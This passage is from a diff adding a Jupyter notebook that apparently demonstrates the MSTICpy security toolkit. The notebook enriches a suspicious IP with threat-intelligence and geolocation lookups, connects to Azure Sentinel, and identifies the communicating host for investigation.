+     ]
+    },
+    {
+     "data": {
+      "text/html": [
+       "<p style='font-weight: bold'>Threat Intel results for 31.220.60.108:</p>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>Ioc</th>\n",
+       "      <th>IocType</th>\n",
+       "      <th>QuerySubtype</th>\n",
+       "      <th>Provider</th>\n",
+       "      <th>Result</th>\n",
+       "      <th>Severity</th>\n",
+       "      <th>Details</th>\n",
+       "      <th>RawResult</th>\n",
+       "      <th>Reference</th>\n",
+       "      <th>Status</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>OTX</th>\n",
+       "      <td>31.220.60.108</td>\n",
+       "      <td>ipv4</td>\n",
+       "      <td>None</td>\n",
+       "      <td>OTX</td>\n",
+       "      <td>True</td>\n",
+       "      <td>high</td>\n",
+       "      <td>{'pulse_count': 6, 'names': ['Card Skimmer Found Hitting Vulnerable E-Commerce Sites', 'Credit c...</td>\n",
+       "      <td>{'sections': ['general', 'geo', 'reputation', 'url_list', 'passive_dns', 'malware', 'nids_list',...</td>\n",
+       "      <td>https://otx.alienvault.com/api/v1/indicators/IPv4/31.220.60.108/general</td>\n",
+       "      <td>0</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>XForce</th>\n",
+       "      <td>31.220.60.108</td>\n",
+       "      <td>ipv4</td>\n",
+       "      <td>None</td>\n",
+       "      <td>XForce</td>\n",
+       "      <td>True</td>\n",
+       "      <td>high</td>\n",
+       "      <td>{'score': 7.1, 'cats': {'Malware': 71}, 'categoryDescriptions': {'Malware': 'This category lists...</td>\n",
+       "      <td>{'ip': '31.220.60.108', 'history': [{'created': '2012-03-22T07:26:00.000Z', 'reason': 'Regional ...</td>\n",
+       "      <td>https://api.xforce.ibmcloud.com/ipr/31.220.60.108</td>\n",
+       "      <td>0</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "                  Ioc IocType QuerySubtype Provider Result Severity  \\\n",
+       "OTX     31.220.60.108    ipv4         None      OTX   True     high   \n",
+       "XForce  31.220.60.108    ipv4         None   XForce   True     high   \n",
+       "\n",
+       "                                                                                                    Details  \\\n",
+       "OTX     {'pulse_count': 6, 'names': ['Card Skimmer Found Hitting Vulnerable E-Commerce Sites', 'Credit c...   \n",
+       "XForce  {'score': 7.1, 'cats': {'Malware': 71}, 'categoryDescriptions': {'Malware': 'This category lists...   \n",
+       "\n",
+       "                                                                                                  RawResult  \\\n",
+       "OTX     {'sections': ['general', 'geo', 'reputation', 'url_list', 'passive_dns', 'malware', 'nids_list',...   \n",
+       "XForce  {'ip': '31.220.60.108', 'history': [{'created': '2012-03-22T07:26:00.000Z', 'reason': 'Regional ...   \n",
+       "\n",
+       "                                                                      Reference  \\\n",
+       "OTX     https://otx.alienvault.com/api/v1/indicators/IPv4/31.220.60.108/general   \n",
+       "XForce                        https://api.xforce.ibmcloud.com/ipr/31.220.60.108   \n",
+       "\n",
+       "       Status  \n",
+       "OTX         0  \n",
+       "XForce      0  "
+      ]
+     },
+     "execution_count": 12,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "# Get and display WhoIs data\n",
+    "md(f\"Target IP: {dest_ip}\", 'bold')\n",
+    "md(f\"{dest_ip} is a {get_ip_type(dest_ip)} IP address\")\n",
+    "whois_info = get_whois_info(dest_ip)\n",
+    "md(f'Whois Registrar Info :', styles=[\"bold\"])\n",
+    "md(f\"ASN Owner: {whois_info[0]}\")\n",
+    "md(f\"ASN Address: {whois_info[1]['nets'][0]['address']}\")\n",
+    "    \n",
+    "# Get Passive DNS results\n",
+    "result = ti.lookup_ioc(observable=dest_ip, ico_type=\"ipv4\", ioc_query_type=\"passivedns\", providers=[\"XForce\"])\n",
+    "md(f\"Passive DNS records for {dest_ip}:\", styles=[\"bold\"])\n",
+    "for res in ti.result_to_df(result)['RawResult'][0]['Passive']['records']:\n",
+    "    print(res['value'],\" - \", res['last'])\n",
+    "    \n",
+    "# Lookup ip IPAddress in threat intel feeds\n",
+    "resp = ti.lookup_ioc(observable=dest_ip)\n",
+    "md(f\"Threat Intel results for {dest_ip}:\", styles=[\"bold\"])\n",
+    "ti.result_to_df(resp)"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "As well as returning the raw data from these enrichment sources MSTICpy has features to allow for visualization of that data to make it more accessible. Below we get the [IP geolocation](https://msticpy.readthedocs.io/en/latest/data_acquisition/GeoIPLookups.html) and use the [Folium Map](https://msticpy.readthedocs.io/en/latest/visualization/FoliumMap.html) feature to plot the IP address location on an interactive map.\n",
+    "> Note: uses the Python *Folium* package, which is a wrapper around *Leafletjs*"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 14,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<p style=''><h3>Location of remote IP</h3></p>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<div style=\"width:100%;\"><div style=\"position:relative;width:100%;height:0;padding-bottom:60%;\"><span style=\"color:#565656\">Make this Notebook Trusted to load map: File -> Trust Notebook</span><iframe src=\"about:blank\" style=\"position:absolute;width:100%;height:100%;left:0;top:0;border:none !important;\" data-html=PCFET0NUWVBFIGh0bWw+CjxoZWFkPiAgICAKICAgIDxtZXRhIGh0dHAtZXF1aXY9ImNvbnRlbnQtdHlwZSIgY29udGVudD0idGV4dC9odG1sOyBjaGFyc2V0PVVURi04IiAvPgogICAgCiAgICAgICAgPHNjcmlwdD4KICAgICAgICAgICAgTF9OT19UT1VDSCA9IGZhbHNlOwogICAgICAgICAgICBMX0RJU0FCTEVfM0QgPSBmYWxzZTsKICAgICAgICA8L3NjcmlwdD4KICAgIAogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuLmpzZGVsaXZyLm5ldC9ucG0vbGVhZmxldEAxLjYuMC9kaXN0L2xlYWZsZXQuanMiPjwvc2NyaXB0PgogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY29kZS5qcXVlcnkuY29tL2pxdWVyeS0xLjEyLjQubWluLmpzIj48L3NjcmlwdD4KICAgIDxzY3JpcHQgc3JjPSJodHRwczovL21heGNkbi5ib290c3RyYXBjZG4uY29tL2Jvb3RzdHJhcC8zLjIuMC9qcy9ib290c3RyYXAubWluLmpzIj48L3NjcmlwdD4KICAgIDxzY3JpcHQgc3JjPSJodHRwczovL2NkbmpzLmNsb3VkZmxhcmUuY29tL2FqYXgvbGlicy9MZWFmbGV0LmF3ZXNvbWUtbWFya2Vycy8yLjAuMi9sZWFmbGV0LmF3ZXNvbWUtbWFya2Vycy5qcyI+PC9zY3JpcHQ+CiAgICA8bGluayByZWw9InN0eWxlc2hlZXQiIGhyZWY9Imh0dHBzOi8vY2RuLmpzZGVsaXZyLm5ldC9ucG0vbGVhZmxldEAxLjYuMC9kaXN0L2xlYWZsZXQuY3NzIi8+CiAgICA8bGluayByZWw9InN0eWxlc2hlZXQiIGhyZWY9Imh0dHBzOi8vbWF4Y2RuLmJvb3RzdHJhcGNkbi5jb20vYm9vdHN0cmFwLzMuMi4wL2Nzcy9ib290c3RyYXAubWluLmNzcyIvPgogICAgPGxpbmsgcmVsPSJzdHlsZXNoZWV0IiBocmVmPSJodHRwczovL21heGNkbi5ib290c3RyYXBjZG4uY29tL2Jvb3RzdHJhcC8zLjIuMC9jc3MvYm9vdHN0cmFwLXRoZW1lLm1pbi5jc3MiLz4KICAgIDxsaW5rIHJlbD0ic3R5bGVzaGVldCIgaHJlZj0iaHR0cHM6Ly9tYXhjZG4uYm9vdHN0cmFwY2RuLmNvbS9mb250LWF3ZXNvbWUvNC42LjMvY3NzL2ZvbnQtYXdlc29tZS5taW4uY3NzIi8+CiAgICA8bGluayByZWw9InN0eWxlc2hlZXQiIGhyZWY9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL0xlYWZsZXQuYXdlc29tZS1tYXJrZXJzLzIuMC4yL2xlYWZsZXQuYXdlc29tZS1tYXJrZXJzLmNzcyIvPgogICAgPGxpbmsgcmVsPSJzdHlsZXNoZWV0IiBocmVmPSJodHRwczovL3Jhd2Nkbi5naXRoYWNrLmNvbS9weXRob24tdmlzdWFsaXphdGlvbi9mb2xpdW0vbWFzdGVyL2ZvbGl1bS90ZW1wbGF0ZXMvbGVhZmxldC5hd2Vzb21lLnJvdGF0ZS5jc3MiLz4KICAgIDxzdHlsZT5odG1sLCBib2R5IHt3aWR0aDogMTAwJTtoZWlnaHQ6IDEwMCU7bWFyZ2luOiAwO3BhZGRpbmc6IDA7fTwvc3R5bGU+CiAgICA8c3R5bGU+I21hcCB7cG9zaXRpb246YWJzb2x1dGU7dG9wOjA7Ym90dG9tOjA7cmlnaHQ6MDtsZWZ0OjA7fTwvc3R5bGU+CiAgICAKICAgICAgICAgICAgPG1ldGEgbmFtZT0idmlld3BvcnQiIGNvbnRlbnQ9IndpZHRoPWRldmljZS13aWR0aCwKICAgICAgICAgICAgICAgIGluaXRpYWwtc2NhbGU9MS4wLCBtYXhpbXVtLXNjYWxlPTEuMCwgdXNlci1zY2FsYWJsZT1ubyIgLz4KICAgICAgICAgICAgPHN0eWxlPgogICAgICAgICAgICAgICAgI21hcF83MTk3YTBjYWZhM2Y0MjkzODg0MGQ4Yjg5MzQxYWQ5MCB7CiAgICAgICAgICAgICAgICAgICAgcG9zaXRpb246IHJlbGF0aXZlOwogICAgICAgICAgICAgICAgICAgIHdpZHRoOiAxMDAuMCU7CiAgICAgICAgICAgICAgICAgICAgaGVpZ2h0OiAxMDAuMCU7CiAgICAgICAgICAgICAgICAgICAgbGVmdDogMC4wJTsKICAgICAgICAgICAgICAgICAgICB0b3A6IDAuMCU7CiAgICAgICAgICAgICAgICB9CiAgICAgICAgICAgIDwvc3R5bGU+CiAgICAgICAgCjwvaGVhZD4KPGJvZHk+ICAgIAogICAgCiAgICAgICAgICAgIDxkaXYgY2xhc3M9ImZvbGl1bS1tYXAiIGlkPSJtYXBfNzE5N2EwY2FmYTNmNDI5Mzg4NDBkOGI4OTM0MWFkOTAiID48L2Rpdj4KICAgICAgICAKPC9ib2R5Pgo8c2NyaXB0PiAgICAKICAgIAogICAgICAgICAgICB2YXIgbWFwXzcxOTdhMGNhZmEzZjQyOTM4ODQwZDhiODkzNDFhZDkwID0gTC5tYXAoCiAgICAgICAgICAgICAgICAibWFwXzcxOTdhMGNhZmEzZjQyOTM4ODQwZDhiODkzNDFhZDkwIiwKICAgICAgICAgICAgICAgIHsKICAgICAgICAgICAgICAgICAgICBjZW50ZXI6IFs1Ni4wLCAyNC4wXSwKICAgICAgICAgICAgICAgICAgICBjcnM6IEwuQ1JTLkVQU0czODU3LAogICAgICAgICAgICAgICAgICAgIHpvb206IDQsCiAgICAgICAgICAgICAgICAgICAgem9vbUNvbnRyb2w6IHRydWUsCiAgICAgICAgICAgICAgICAgICAgcHJlZmVyQ2FudmFzOiBmYWxzZSwKICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgKTsKCiAgICAgICAgICAgIAoKICAgICAgICAKICAgIAogICAgICAgICAgICB2YXIgdGlsZV9sYXllcl9lYTRmYzBjMzgxOTc0MzI2OTIyNDFjMDdkNWE5NGNlZSA9IEwudGlsZUxheWVyKAogICAgICAgICAgICAgICAgImh0dHBzOi8ve3N9LnRpbGUub3BlbnN0cmVldG1hcC5vcmcve3p9L3t4fS97eX0ucG5nIiwKICAgICAgICAgICAgICAgIHsiYXR0cmlidXRpb24iOiAiRGF0YSBieSBcdTAwMjZjb3B5OyBcdTAwM2NhIGhyZWY9XCJodHRwOi8vb3BlbnN0cmVldG1hcC5vcmdcIlx1MDAzZU9wZW5TdHJlZXRNYXBcdTAwM2MvYVx1MDAzZSwgdW5kZXIgXHUwMDNjYSBocmVmPVwiaHR0cDovL3d3dy5vcGVuc3RyZWV0bWFwLm9yZy9jb3B5cmlnaHRcIlx1MDAzZU9EYkxcdTAwM2MvYVx1MDAzZS4iLCAiZGV0ZWN0UmV0aW5hIjogZmFsc2UsICJtYXhOYXRpdmVab29tIjogMTgsICJtYXhab29tIjogMTgsICJtaW5ab29tIjogMCwgIm5vV3JhcCI6IGZhbHNlLCAib3BhY2l0eSI6IDEsICJzdWJkb21haW5zIjogImFiYyIsICJ0bXMiOiBmYWxzZX0KICAgICAgICAgICAgKS5hZGRUbyhtYXBfNzE5N2EwY2FmYTNmNDI5Mzg4NDBkOGI4OTM0MWFkOTApOwogICAgICAgIAogICAgCiAgICAgICAgICAgIHZhciBtYXJrZXJfMDNkN2RkMTMyNzljNDc3ZDhhZmM4NzYzMmZlOTRkODMgPSBMLm1hcmtlcigKICAgICAgICAgICAgICAgIFs1Ni4wLCAyNC4wXSwKICAgICAgICAgICAgICAgIHt9CiAgICAgICAgICAgICkuYWRkVG8obWFwXzcxOTdhMGNhZmEzZjQyOTM4ODQwZDhiODkzNDFhZDkwKTsKICAgICAgICAKICAgIAogICAgICAgICAgICB2YXIgaWNvbl8zNjc4NTM0YjRmMzE0ZmMxYmI4OWRkODZhOGJlZTI4YyA9IEwuQXdlc29tZU1hcmtlcnMuaWNvbigKICAgICAgICAgICAgICAgIHsiZXh0cmFDbGFzc2VzIjogImZhLXJvdGF0ZS0wIiwgImljb24iOiAiaW5mby1zaWduIiwgImljb25Db2xvciI6ICJ3aGl0ZSIsICJtYXJrZXJDb2xvciI6ICJyZWQiLCAicHJlZml4IjogImdseXBoaWNvbiJ9CiAgICAgICAgICAgICk7CiAgICAgICAgICAgIG1hcmtlcl8wM2Q3ZGQxMzI3OWM0NzdkOGFmYzg3NjMyZmU5NGQ4My5zZXRJY29uKGljb25fMzY3ODUzNGI0ZjMxNGZjMWJiODlkZDg2YThiZWUyOGMpOwogICAgICAgIAogICAgCiAgICAgICAgdmFyIHBvcHVwXzNjM2ZhZmFlMGUyNTRiZGJhY2Q2MTRhOGFmMmIyY2IwID0gTC5wb3B1cCh7Im1heFdpZHRoIjogIjEwMCUifSk7CgogICAgICAgIAogICAgICAgICAgICB2YXIgaHRtbF8xZWI2YmNlMDIyNzU0MDI0YjYxODJjOGMyYzJjYTQ1MiA9ICQoYDxkaXYgaWQ9Imh0bWxfMWViNmJjZTAyMjc1NDAyNGI2MTgyYzhjMmMyY2E0NTIiIHN0eWxlPSJ3aWR0aDogMTAwLjAlOyBoZWlnaHQ6IDEwMC4wJTsiPlR5cGU9Z2VvbG9jYXRpb24sIENvdW50cnlDb2RlPUxULCBDb3VudHJ5TmFtZT1SZXB1YmxpYyBvZiBMaXRodWFuaWEsIExvbmdpdHVkZT0yNC4wLCBMYXRpdHVkZT01Ni4wPGJyPklQOiAzMS4yMjAuNjAuMTA4PC9kaXY+YClbMF07CiAgICAgICAgICAgIHBvcHVwXzNjM2ZhZmFlMGUyNTRiZGJhY2Q2MTRhOGFmMmIyY2IwLnNldENvbnRlbnQoaHRtbF8xZWI2YmNlMDIyNzU0MDI0YjYxODJjOGMyYzJjYTQ1Mik7CiAgICAgICAgCgogICAgICAgIG1hcmtlcl8wM2Q3ZGQxMzI3OWM0NzdkOGFmYzg3NjMyZmU5NGQ4My5iaW5kUG9wdXAocG9wdXBfM2MzZmFmYWUwZTI1NGJkYmFjZDYxNGE4YWYyYjJjYjApCiAgICAgICAgOwoKICAgICAgICAKICAgIAogICAgCiAgICAgICAgICAgIG1hcmtlcl8wM2Q3ZGQxMzI3OWM0NzdkOGFmYzg3NjMyZmU5NGQ4My5iaW5kVG9vbHRpcCgKICAgICAgICAgICAgICAgIGA8ZGl2PgogICAgICAgICAgICAgICAgICAgICBOb25lLCBSZXB1YmxpYyBvZiBMaXRodWFuaWEKICAgICAgICAgICAgICAgICA8L2Rpdj5gLAogICAgICAgICAgICAgICAgeyJzdGlja3kiOiB0cnVlfQogICAgICAgICAgICApOwogICAgICAgIAo8L3NjcmlwdD4= onload=\"this.contentDocument.open();this.contentDocument.write(atob(this.getAttribute('data-html')));this.contentDocument.close();\" allowfullscreen webkitallowfullscreen mozallowfullscreen></iframe></div></div>"
+      ],
+      "text/plain": [
+       "<msticpy.nbtools.foliummap.FoliumMap at 0x1b6b89bbcd0>"
+      ]
+     },
+     "execution_count": 14,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "# Plot IP geolocation on a map\n",
+    "folium_map = FoliumMap(zoom_start=4)\n",
+    "md('<h3>Location of remote IP</h3>')\n",
+    "folium_map.add_ip_cluster(ip_entities=convert_to_ip_entities(dest_ip), color=\"red\")\n",
+    "folium_map.center_map()\n",
+    "folium_map"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Host Lookup\n",
+    "Once we have some context on our remote IP address we can pivot our investigation to look at the local host that has been communicating with it."
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### Data Acquisition from Azure Sentinel\n",
+    "As well as *Splunk*, MSTICpy has a query provider for *Azure Sentinel*. For the next phase of our investigation we are going to use this query provider to acquire data.<br><br>\n",
+    "With the Splunk connection we provided connection details directly to our query provider when calling `.connect()`. We can also store details in a [msticpy configuration file](https://msticpy.readthedocs.io/en/latest/getting_started/msticpyconfig.html) (`msticpyconfig.yaml`) and pass them to the query provider programmatically. Here we use the [Workspace Config](https://msticpy.readthedocs.io/en/latest/msticpy.common.html?highlight=WorkspaceConfig#msticpy.common.wsconfig.WorkspaceConfig) feature to access this configuration and retrieve the items we need to authenticate to Azure Sentinel.\n",
+    "\n",
+    "> **Note**: the authentication flow for Azure Sentinel is different from Splunk and use the Oauth2.0 device code process."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 15,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "Please wait. Loading Kqlmagic extension...\n"
+     ]
+    },
+    {
+     "data": {
+      "application/javascript": [
+       "try {IPython.notebook.kernel.reconnect();} catch(err) {;}"
+      ],
+      "text/plain": [
+       "<IPython.core.display.Javascript object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": [
+       "try {IPython.notebook.kernel.execute(\"NOTEBOOK_URL = '\" + window.location + \"'\");} catch(err) {;}"
+      ],
+      "text/plain": [
+       "<IPython.core.display.Javascript object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": [
+       "try {IPython.notebook.kernel.execute(\"NOTEBOOK_URL = '\" + window.location + \"'\");} catch(err) {;}"
+      ],
+      "text/plain": [
+       "<IPython.core.display.Javascript object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<!DOCTYPE html>\n",
+       "                            <html><body>\n",
+       "\n",
+       "                            <!-- h1 id=\"user_code_p\"><b>ABFZ59WQV</b><br></h1-->\n",
+       "\n",
+       "                            <input  id=\"kql_MagicCodeAuthInput\" type=\"text\" readonly style=\"font-weight: bold; border: none;\" size = '9' value='ABFZ59WQV'>\n",
+       "\n",
+       "                            <button id='kql_MagicCodeAuth_button', onclick=\"this.style.visibility='hidden';kql_MagicCodeAuthFunction()\">Copy code to clipboard and authenticate</button>\n",
+       "\n",
+       "                            <script>\n",
+       "                            var kql_MagicUserCodeAuthWindow = null;\n",
+       "                            function kql_MagicCodeAuthFunction() {\n",
+       "                                /* Get the text field */\n",
+       "                                var copyText = document.getElementById(\"kql_MagicCodeAuthInput\");\n",
+       "\n",
+       "                                /* Select the text field */\n",
+       "                                copyText.select();\n",
+       "\n",
+       "                                /* Copy the text inside the text field */\n",
+       "                                document.execCommand(\"copy\");\n",
+       "\n",
+       "                                /* Alert the copied text */\n",
+       "                                // alert(\"Copied the text: \" + copyText.value);\n",
+       "\n",
+       "                                var w = screen.width / 2;\n",
+       "                                var h = screen.height / 2;\n",
+       "                                params = 'width='+w+',height='+h\n",
+       "                                kql_MagicUserCodeAuthWindow = window.open('https://microsoft.com/devicelogin', 'kql_MagicUserCodeAuthWindow', params);\n",
+       "\n",
+       "                                // TODO: save selected cell index, so that the clear will be done on the lince cell\n",
+       "                            }\n",
+       "                            </script>\n",
+       "\n",
+       "                            </body></html>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<!DOCTYPE html>\n",
+       "                            <html><body><script>\n",
+       "\n",
+       "                                // close authentication window\n",
+       "                                if (kql_MagicUserCodeAuthWindow && kql_MagicUserCodeAuthWindow.opener != null && !kql_MagicUserCodeAuthWindow.closed) {\n",
+       "                                    kql_MagicUserCodeAuthWindow.close()\n",
+       "                                }\n",
+       "                                // TODO: make sure, you clear the right cell. BTW, not sure it is a must to do any clearing\n",
+       "\n",
+       "                                // clear output cell\n",
+       "                                Jupyter.notebook.clear_output(Jupyter.notebook.get_selected_index())\n",
+       "\n",
+       "                                // TODO: if in run all mode, move to last cell, otherwise move to next cell\n",
+       "                                // move to next cell\n",
+       "\n",
+       "                            </script></body></html>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<!DOCTYPE html>\n",
+       "            <html><body>\n",
+       "            <div style=''>\n",
+       "            \n",
+       "            <button onclick=\"this.style.visibility='visible';\n",
+       "            kql_MagicLaunchWindowFunction('kqlmagic/temp_files/ea778663-4a01-4aa9-b6ce-c229e383c8ae/_52b1ab41-869e-4138-9e40-2a4457f09bf0_at_loganalytics_schema.html', 'fullscreen=no,directories=no,location=no,menubar=no,resizable=yes,scrollbars=yes,status=no,titlebar=no,toolbar=no,', '_52b1ab41_869e_4138_9e40_2a4457f09bf0_at_loganalytics_schema', '');\n",
+       "            kql_MagicCloseWindow(kql_Magic__52b1ab41_869e_4138_9e40_2a4457f09bf0_at_loganalytics_schema, -1, -1);\">\n",
+       "            popup schema 52b1ab41-869e-4138-9e40-2a4457f09bf0@loganalytics</button>\n",
+       "            </div>\n",
+       "\n",
+       "            <script>\n",
+       "            var kql_Magic__52b1ab41_869e_4138_9e40_2a4457f09bf0_at_loganalytics_schema = null;\n",
+       "\n",
+       "\n",
+       "            function kql_MagicCloseWindow(window_obj, obj_secs, itself_secs) {\n",
+       "                if (obj_secs >= 0) {\n",
+       "                    _timeout = setTimeout(function(){\n",
+       "                        window_obj.close();\n",
+       "                        if (itself_secs >= 0) {\n",
+       "                            __timeout = setTimeout(function(){window.close();}, itself_secs * 1000);\n",
+       "                        }\n",
+       "                    }, obj_secs * 1000);\n",
+       "                } else if (itself_secs >= 0) {\n",
+       "                    _timeout = setTimeout(function(){window.close();}, itself_secs * 1000);\n",
+       "                }\n",
+       "            }\n",
+       "\n",
+       "            function kql_MagicLaunchWindowFunction(file_path, window_params, window_name, host_or_text) {\n",
+       "                var url;\n",
+       "                if (host_or_text == 'text') {\n",
+       "                    url = ''\n",
+       "                } else if (file_path.startsWith('http')) {\n",
+       "                    url = file_path;\n",
+       "                } else {\n",
+       "                    var base_url = '';\n",
+       "\n",
+       "                    // check if azure notebook\n",
+       "                    var azure_host = (host_or_text == null || host_or_text.length == 0) ? 'https://notebooks.azure.com' : host_or_text;\n",
+       "                    var start = azure_host.search('//');\n",
+       "                    var azure_host_suffix = '.' + azure_host.substring(start+2);\n",
+       "\n",
+       "                    var loc = String(window.location);\n",
+       "                    var end = loc.search(azure_host_suffix);\n",
+       "                    start = loc.search('//');\n",
+       "                    if (start > 0 && end > 0) {\n",
+       "                        var parts = loc.substring(start+2, end).split('-');\n",
+       "                        if (parts.length == 2) {\n",
+       "                            var library = parts[0];\n",
+       "                            var user = parts[1];\n",
+       "                            base_url = azure_host + '/api/user/' +user+ '/library/' +library+ '/html/';\n",
+       "                        }\n",
+       "                    }\n",
+       "\n",
+       "                    // check if local jupyter lab\n",
+       "                    if (base_url.length == 0) {\n",
+       "                        var configDataScipt  = document.getElementById('jupyter-config-data');\n",
+       "                        if (configDataScipt != null) {\n",
+       "                            var jupyterConfigData = JSON.parse(configDataScipt.textContent);\n",
+       "                            if (jupyterConfigData['appName'] == 'JupyterLab' && jupyterConfigData['serverRoot'] != null &&  jupyterConfigData['treeUrl'] != null) {\n",
+       "                                var basePath = 'C:/Users/pebryan/Documents/source/notebooks' + '/';\n",
+       "                                if (basePath.startsWith(jupyterConfigData['serverRoot'])) {\n",
+       "                                    base_url = '/files/' + basePath.substring(jupyterConfigData['serverRoot'].length+1);\n",
+       "                                }\n",
+       "                            }\n",
+       "                        }\n",
+       "                    }\n",
+       "\n",
+       "                    // assume local jupyter notebook\n",
+       "                    if (base_url.length == 0) {\n",
+       "\n",
+       "                        var parts = loc.split('/');\n",
+       "                        parts.pop();\n",
+       "                        base_url = parts.join('/') + '/';\n",
+       "                    }\n",
+       "                    url = base_url + file_path;\n",
+       "                }\n",
+       "\n",
+       "                window.focus();\n",
+       "                var w = screen.width / 2;\n",
+       "                var h = screen.height / 2;\n",
+       "                params = 'width='+w+',height='+h;\n",
+       "                // kql_Magic + window_name should be a global variable \n",
+       "                window_obj = window.open(url, window_name, window_params + params);\n",
+       "                if (url == '') {\n",
+       "                    var el = window_obj.document.createElement('p');\n",
+       "                    window_obj.document.body.overflow = 'auto';\n",
+       "                    el.style.top = 0;\n",
+       "                    el.style.left = 0;\n",
+       "                    el.innerHTML = file_path;\n",
+       "                    window_obj.document.body.appendChild(el);\n",
+       "                }\n",
+       "                kql_Magic__52b1ab41_869e_4138_9e40_2a4457f09bf0_at_loganalytics_schema = window_obj;\n",
+       "            }\n",
+       "            </script>\n",
+       "\n",
+       "            </body></html>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": [
+       "try {IPython.notebook.kernel.execute(\"NOTEBOOK_URL = '\" + window.location + \"'\");} catch(err) {;}"
+      ],
+      "text/plain": [
+       "<IPython.core.display.Javascript object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "# Initalize and connect to Azure Sentinel using details from our config file.\n",
+    "qry_prov = QueryProvider('LogAnalytics')\n",
+    "wkspace = WorkspaceConfig()\n",
+    "qry_prov.connect(wkspace.code_connect_str)"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "Once connected we can query Azure Sentinel in a similar way to Splunk - by providing a text query string.\n",
+    "<br>We substitute the `source_ip` value we obtained in the previous section *Enrich and Pivot on IP Addresses*"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 16,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "application/javascript": [
+       "try {IPython.notebook.kernel.execute(\"NOTEBOOK_URL = '\" + window.location + \"'\");} catch(err) {;}"
+      ],
+      "text/plain": [
+       "<IPython.core.display.Javascript object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<p style=''>Host to investigate: <b>BlackHatDemoHost</b></p>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "# Query Azure Sentinel to get host details.\n",
+    "query = f\"Heartbeat | where ComputerIP == '{source_ip}'\"\n",
+    "\n",
+    "host = qry_prov.exec_query(query)\n",
+    "host_name = host['Computer'].iloc[0]\n",
+    "md(f\"Host to investigate: <b>{host_name}t</b>\")"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Investigate Host\n",
+    "Now that we have identified our host we want to perform some standard analysis to get a summary of the host. Rather than code these steps individually each time we create a notebook that investigates hosts we have grouped together several MSTICpy features and investigation steps into a single function we call a notebooklet - by calling this notebooklet we can easily conduct analysis that would require hundreds of lines of code if coded directly in a notebook."
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### Use a notebooklet"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 18,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "Loaded providers: LogAnalytics, azuredata, geolitelookup, tilookup\n"
+     ]
+    },
+    {
+     "data": {
+      "text/html": [
+       "<h1>Host Entity Summary</h1>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
